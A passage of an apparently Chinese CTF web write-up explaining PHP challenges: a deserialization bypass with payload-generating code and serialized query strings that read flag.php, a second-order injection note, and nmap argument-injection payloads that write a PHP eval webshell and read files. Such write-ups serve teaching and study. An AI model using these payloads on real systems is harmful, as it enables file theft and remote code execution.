src="https://wechat2rss.xlab.app/img-proxy/?k=30cbf492&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGk7CbtVp5ko1sbneE8Q3mj3CLcvog6iaNQTfVLOWhfCZJDKZInBVcJMg%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">由于<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">op</code>属性为<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">&#34;1&#34;</code>，继续调用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">write</code>方法，若写入的内容不超过100个字符，则利用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">file_put_contents</code>函数写文件，并返回状态消息给<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">output</code>方法输出到页面上</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">如果满足<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">$this-&gt;op == &#34;2&#34;</code>，就会调用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">read</code>方法，利用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">file_get_contents</code>函数读文件，并返回文件内容给<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">output</code>方法输出到页面上</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">最后析构函数如果发现满足<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">$this-&gt;op === &#34;2&#34;</code>就会改回<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">&#34;1&#34;</code>，将<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">content</code>属性置空并再次调用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">process</code>方法<span style="font-size: 0px;"></span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="1.0696517412935322" data-s="300,640" style="" data-type="png" data-w="804" src="https://wechat2rss.xlab.app/img-proxy/?k=febdb829&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGjOG2bia4klnoPeIia3tXPKbF2sgIN0ZeUY6vm2VBIMASIAJ55LBKdIwQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">这里反序列化直接可控的类属性是<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">protected</code>类型，在序列化后会包含不可见字符<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">%00</code>，不但过不了<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">is_valid</code>函数的检查，在php版本小于5.3.4时还可能会导致截断</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">由于析构函数会将<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">content</code>属性置空，所以绕过<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">op</code>参数检查后，输出文件内容实际上是通过析构函数（而非构造函数）中的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">process</code>方法调用的。但php构造函数与析构函数工作路径可能会不一致，这也就是有些环境直接读当前目录下的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">flag.php</code>读不到东西的原因</p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.64921875" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=030b8416&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGEfzQxqicC3Jru41j5lXKQ8pro6UFJTPsqg98IbicMFdlibhv9ICXcNBVg%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">测试了linux下php的cli模式、apache php_module模式与nginx FastCGI模式，结果同上。windows下看到b1ind师傅发的图，析构函数的工作目录是在apache目录下</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">因此想成功读到flag，需要将反序列化默认生成的不转义二进制的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">s</code>字符串类型，改为支持用十六进制表示<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">S</code>字符串类型绕过检查。在php版本高于7.1时，也可以直接利用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">public</code>覆盖掉<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">private</code>绕过检查</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">利用php弱类型比较满足<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">2 == &#34;2&#34;</code>，但不满足强类型比较<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">2 === &#34;2&#34;</code>的特性，绕过析构函数的拦截</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">然后按道理应该先从<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/proc/self/cmdline</code>中获取httpd配置文件路径，再从<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/web/config/httpd.conf</code>进一步获取web目录的绝对路径，利用绝对路径读<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/web/html/flag.php</code>的内容。。。但是线上环境相对路径就能直接读出来了</p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;"><span style="box-sizing: border-box;color: rgb(34, 134, 58);">&lt;?php</span><br/><span style="box-sizing: border-box;color: rgb(215, 58, 73);">class</span> <span style="box-sizing: border-box;color: rgb(227, 98, 9);">FileHandler</span> {<br/>    <span style="box-sizing: border-box;color: rgb(215, 58, 73);">protected</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);"><span style="box-sizing: border-box;">$</span>op</span> = <span style="box-sizing: border-box;color: rgb(0, 92, 197);">2</span>;<br/>    <span style="box-sizing: border-box;color: rgb(215, 58, 73);">protected</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);"><span style="box-sizing: border-box;">$</span>filename</span> = <span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;/var/www/html/flag.php&#34;</span>; <span style="box-sizing: border-box;color: rgb(106, 115, 125);"># ctfhub环境</span><br/>    <span style="box-sizing: border-box;color: rgb(215, 58, 73);">protected</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);"><span style="box-sizing: border-box;">$</span>content</span>;<br/>}<br/><span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>a</span> = <span style="box-sizing: border-box;color: rgb(215, 58, 73);">new</span> <span style="box-sizing: border-box;color: rgb(227, 98, 9);">FileHandler</span>();<br/><span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>b</span> = <span style="box-sizing: border-box;color: rgb(111, 66, 193);">urlencode</span>(<span style="box-sizing: border-box;color: rgb(111, 66, 193);">serialize</span>(<span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>a</span>));<br/><span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>b</span> = <span style="box-sizing: border-box;color: rgb(111, 66, 193);">str_replace</span>(<span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;s&#34;</span>, <span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;S&#34;</span>, <span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>b</span>);<br/><span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>b</span> = <span style="box-sizing: border-box;color: rgb(111, 66, 193);">str_replace</span>(<span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;%00&#34;</span>, <span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;\\00&#34;</span>, <span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>b</span>);<br/><span style="box-sizing: border-box;color: rgb(215, 58, 73);">echo</span> <span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>b</span>;<br/><span style="box-sizing: border-box;color: rgb(106, 115, 125);"># ?str=O%3A11%3A%22FileHandler%22%3A3%3A%7BS%3A5%3A%22\00%2A\00op%22%3Bi%3A2%3BS%3A11%3A%22\00%2A\00filename%22%3BS%3A22%3A%22/var/www/html/flag.php%22%3BS%3A10%3A%22\00%2A\00content%22%3BN%3B%7D</span></pre><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;"><span style="box-sizing: border-box;color: rgb(34, 134, 58);">&lt;?php</span><br/><span style="box-sizing: border-box;color: rgb(215, 58, 73);">class</span> <span style="box-sizing: border-box;color: rgb(227, 98, 9);">FileHandler</span> {<br/>    <span style="box-sizing: border-box;color: rgb(215, 58, 73);">public</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);"><span style="box-sizing: border-box;">$</span>op</span>;<br/>    <span style="box-sizing: border-box;color: rgb(215, 58, 73);">public</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);"><span style="box-sizing: border-box;">$</span>filename</span>;<br/>    <span style="box-sizing: border-box;color: rgb(215, 58, 73);">public</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);"><span style="box-sizing: border-box;">$</span>content</span>;<br/>}<br/><span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>a</span> = <span style="box-sizing: border-box;color: rgb(215, 58, 73);">new</span> <span style="box-sizing: border-box;color: rgb(227, 98, 9);">FileHandler</span>();<br/><span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>a</span>-&gt;<span style="box-sizing: border-box;color: rgb(0, 92, 197);">op</span> = <span style="box-sizing: border-box;color: rgb(0, 92, 197);">2</span>;<br/><span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>a</span>-&gt;<span style="box-sizing: border-box;color: rgb(0, 92, 197);">filename</span> = <span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;flag.php&#34;</span>;<br/><span style="box-sizing: border-box;color: rgb(215, 58, 73);">echo</span> <span style="box-sizing: border-box;color: rgb(111, 66, 193);">urlencode</span>(<span style="box-sizing: border-box;color: rgb(111, 66, 193);">serialize</span>(<span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(0, 92, 197);">$</span>a</span>));<br/><span style="box-sizing: border-box;color: rgb(106, 115, 125);"># ?str=O%3A11%3A%22FileHandler%22%3A3%3A%7Bs%3A2%3A%22op%22%3Bi%3A2%3Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A7%3A%22content%22%3BN%3B%7D</span></pre><h2 style="box-sizing: border-box;margin-top: 24px;margin-bottom: 16px;font-weight: 600;font-size: 1.5em;line-height: 1.25;padding-bottom: 0.3em;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><svg viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg>Unfinish</h2><p style="text-align: left;">考察PHP二次注入<br/></p><p style="text-align: left;"><br/></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.35546875" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=6e98de8d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGwzyykq2x89Y1MPibVZib6K7hFOa2ewJtJhReksia0CcicelomSxmmdDFoQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">题目与2018年时相同，原理可参考七月火师傅的博客文章：<br/></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="ruby"><code><span class="code-snippet_outer"><span class="code-snippet__symbol">https:</span>/<span class="code-snippet__regexp">/mochazz.github.io/</span><span class="code-snippet__number">2018</span>/08/<span class="code-snippet__number">23</span>/<span class="code-snippet__number">2018</span>网鼎杯第二场Web题解/<span class="code-snippet__comment">#unfinished</span></span></code></pre></section><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">这里同时放一个自己撸的渣脚本<br/></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//github.com/hosch3n/expload/blob/master/PHP-Tricks/unfinish.py</span></span></code></pre></section><h2 style="box-sizing: border-box;margin-top: 24px;margin-bottom: 16px;font-weight: 600;font-size: 1.5em;line-height: 1.25;padding-bottom: 0.3em;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><svg viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg>nmap</h2><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">考察PHP的escapeshellxxx函数单引号逃逸、nmap参数注入写shell</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.4433811802232855" data-s="300,640" style="" data-type="png" data-w="1254" src="https://wechat2rss.xlab.app/img-proxy/?k=35eee48c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGZYZLsa4jTVfIzNibre3hqqh9lTbvJGxCUE2otUGQ2bN8fdibRDYUnx0Q%2F640%3Fwx_fmt%3Dpng"/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">2018年时安恒也出过这题，原理是<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">escapeshellarg</code>与<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">escapeshellcmd</code>的使用顺序不当会导致参数逃逸，分析参见<span class="code-snippet__attribute" style="font-family: Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;font-size: 14px;text-align: left;white-space: pre;background-color: rgba(0, 0, 0, 0.03);">PHP</span><span style="font-family: Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;font-size: 14px;text-align: left;white-space: pre;background-color: rgba(0, 0, 0, 0.03);"> escapeshellarg()+escapeshellcmd() 之殇</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="nginx"><code><span class="code-snippet_outer"><a href="https://paper.seebug.org/164/" target="_blank">https://paper.seebug.org/164/</a></span></code></pre></section><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">在此基础上结合nmap的输出参数写shell，只是这里存在代码waf会拦截<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">php</code>关键字，所以需要稍微绕过一下</p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;"><span style="box-sizing: border-box;color: rgb(106, 115, 125);"># 写webshell</span><br/><span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#39; -oG a.phtml &lt;?=eval($_POST[911])?&gt; &#39;</span><br/><span style="box-sizing: border-box;color: rgb(106, 115, 125);"># 直接读文件</span><br/><span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#39; -o a.txt -iL ../../../../../../../flag &#39;</span></pre><h2 style="box-sizing: border-box;margin-top: 24px;margin-bottom: 16px;font-weight: 600;font-size: 1.5em;line-height: 1.25;padding-bottom: 0.3em;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><svg viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg>phpweb</h2><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">考察PHP利用反序列化绕WAF</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.81640625" data-s="300,640" style="" data-type="png" data-w="1280" 